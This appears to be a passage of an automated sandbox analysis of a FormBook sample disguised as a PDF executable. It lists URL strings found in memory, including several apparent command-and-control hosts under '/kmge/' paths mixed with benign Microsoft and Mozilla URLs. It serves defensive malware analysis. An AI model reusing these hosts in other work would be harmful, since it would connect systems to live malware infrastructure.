Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kickssoccercamp.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.com/kmge/www.kickssoccercamp.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.landfillequip.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyz/kmge/www.landfillequip.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mrawkward.xyzReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.com/kmge/www.szexvideokingyen.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.n5l780.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sacksmantenimiento.storeReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.com/kmge/www.n5l780.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.sejasuapropriachefe.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603845014.0000000010B09000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4594200448.0000000003DD9000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4603845014.0000000010B09000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4594200448.0000000003DD9000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.com/kmge/www.sejasuapropriachefe.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shearwaterpembrokeshire.comReferer:
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs/kmge/
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbs/kmge/www.agritamaperkasaindonesia.com
Source: explorer.exe, 00000007.00000003.3076342419.000000000C477000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982551332.000000000C476000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.szexvideokingyen.sbsReferer:
Source: explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: 101 2043 5770 pdf.exe	String found in binary or memory: https://aka.ms/nativeaot-c
Source: 101 2043 5770 pdf.exe, 00000019.00000002.2357342046.00007FF6802A2000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityY
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://aka.ms/nativeaot-compatibilityy
Source: explorer.exe, 00000007.00000000.2149784147.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ipconfig.exe, 00000009.00000003.2215032606.0000000006088000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ipconfig.exe, 00000009.00000002.4579575870.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000007.00000000.2149784147.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4601846350.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000007.00000002.4598436939.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3075926924.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132972491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2979257208.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000007.00000003.2981180809.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2982713681.000000000C080000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2149784147.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4602035655.000000000C087000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000007.00000002.4595914565.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000007.00000002.4596366982.0000000007415000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3076516101.0000000007414000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

E-Banking Fraud

Yara detected FormBook

